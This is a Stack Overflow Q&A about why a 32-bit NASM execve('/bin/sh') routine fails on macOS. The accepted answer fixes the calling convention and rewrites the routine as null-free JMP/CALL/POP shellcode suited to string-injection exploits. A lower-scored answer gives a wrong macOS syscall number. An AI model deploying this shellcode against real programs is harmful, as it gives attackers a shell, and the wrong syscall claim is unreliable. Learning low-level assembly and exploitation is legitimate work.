# Why syscall doesn't work?

Tags: macos, assembly, x86, nasm, shellcode

I'm on MAC OSX and I'm trying to call through assembly the execve syscall..
His opcode is 59 .
In linux I have to set opcode into eax, then parameters into the others registers, but here I have to put the opcode into eax and push parameters into the stack from right to left.

So I need execve("/bin/sh",NULL,NULL), I found somewhere that with assembly null=0, so I put null into 2nd and 3rd parameters.

```
global start 
section .text
start:
    jmp string
main: 
    ; 59 opcode
    ; int execve(char *fname, char **argp, char **envp);
    pop ebx             ;stringa
    push 0x0            ;3rd param
    push 0x0            ;2nd param
    push ebx            ;1st param
    add eax,0x3b        ;execve opcode
    int 0x80            ;interupt
    sub eax,0x3a        ; exit opcode
    int 0x80
string:
    call main
    db '/bin/sh',0
```

When I try to execute it say:
Bad system call: 12

Comment: Are you intending to write shell code exploits? I ask because it is unclear what your objective is and not sure if you know this kind of code is not the traditional way to write a normal program.

Comment: The canonical Q&A about system call calling conventions is https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-i386-and-x86-6, including for 32-bit OS X / FreeBSD.

Answer (score 8, accepted):

32-bit programs on *BSD* (on which OS/X is based) requires you to push an extra 4 bytes onto the stack if you intend to call `int 0x80` directly. From the [FreeBSD documentation](https://www.freebsd.org/doc/en/books/developers-handbook/x86-system-calls.html) you will find this:

> By default, the FreeBSD kernel uses the C calling convention. Further, although the kernel is accessed using int 80h, it is assumed the program will call a function that issues int 80h, rather than issuing int 80h directly.
>
> [snip]
>
> But assembly language programmers like to shave off cycles. The above example requires a call/ret combination. We can eliminate it by pushing an extra dword:
>
> ```
> open:
> push    dword mode
> push    dword flags
> push    dword path
> mov eax, 5
> push    eax     ; Or any other dword
> int 80h
> add esp, byte 16
> ```

When calling `int 0x80` you need to adjust the stack pointer by 4. Pushing any value will achieve this. In the example they just do a `push eax`. Before your calls to `int 0x80` push 4 bytes onto the stack.

Your other problem is that `add eax,0x3b` for example requires *EAX* to already be zero which is almost likely not the case. To fix that add an `xor eax, eax` to the code.

The fixes could look something like:

```
global start
section .text
start:
    jmp string
main:
    ; 59 opcode
    ; int execve(char *fname, char **argp, char **envp);
    xor eax, eax        ;zero EAX
    pop ebx             ;stringa
    push 0x0            ;3rd param
    push 0x0            ;2nd param
    push ebx            ;1st param
    add eax,0x3b        ;execve opcode
    push eax            ;Push a 4 byte value after parameters per calling convention
    int 0x80            ;interupt
    sub eax,0x3a        ; exit opcode
    push eax            ;Push a 4 byte value after parameters per calling convention
                        ; in this case though it won't matter since the system call
                        ; won't be returning
    int 0x80
string:
    call main
    db '/bin/sh',0
```

---

### Shellcode

Your code is actually called the *JMP/CALL/POP* method and is used for writing exploits. Are you writing an exploit or did you just find this code online? If it is intended to be used as shell code you would need to avoid putting a 0x00 byte in the output string. `push 0x00` will encode 0x00 bytes in the generated code. To avoid this we can use *EAX* which we are now zeroing out and push it on the stack. As well you won't be able to NUL terminate the string so you'd have to move a NUL(0) character into the string. One way after zeroing *EAX* and popping *EBX* is to move zero to the end of the string manually with something like `mov [ebx+7], al`. Seven is the index after the end of the string `/bin/sh`. Your code would then look like this:

```
global start
section .text
start:
    jmp string
main:
    ; 59 opcode
    ; int execve(char *fname, char **argp, char **envp);
    xor eax, eax        ;Zero EAX
    pop ebx             ;stringa
    mov [ebx+7], al     ;append a zero onto the end of the string '/bin/sh' 
    push eax            ;3rd param
    push eax            ;2nd param
    push ebx            ;1st param
    add eax,0x3b        ;execve opcode
    push eax
    int 0x80            ;interupt
    sub eax,0x3a        ; exit opcode
    push eax
    int 0x80
string:
    call main
    db '/bin/sh',1
```

Comment: OS X doesn't follow the 64 bit convention of using `syscall` rather than `int 0x80` ?

Comment: @DavidHoelzer : The OP is using 32-bit code (it wouldn't assemble otherwise). In 32-bit code (on 64-bit OS/X) you'd get an `Illegal instruction: 4` error since SYSCALL isn't available. _SYSCALL_ applies only if he were generating 64-bit code.

Comment: Ah, yes, right you are..  I stopped thinking after "OS X."

Comment: Thanxs mate .. so helpful .. but sometimes shellcodes works also with \x00 in it .. so why ?

Comment: I learned The jump and call from one guy .. I wrote this little assembly, I'm noob at it

Comment: @Kiks777 It depends on the shell code and how it is used. If it is intended to be injected through a string exploit then the `\00` will prematurely end the stream of bytes which is not something you want. If there are `\00` in an exploit like this I'd have to see the code in such a case to make a proper comment.

Answer (score 1):

You are using a 64 bit syscall numbers and a 32 bit instruction to jump to the syscall. That is not going to work.

#### For 32 bit users:


opcode for Linux/MacOS execve: 11
instruction to call syscall: `int 0x80`


#### For 64 bit users:


opcode for Linux execve: 59 (MacOS 64-bit system calls also have a high bit set).
instruction to call syscall: `syscall`

The method for passing args to system calls is also different: 32-bit uses the stack, 64-bit uses similar registers to the function-calling convention.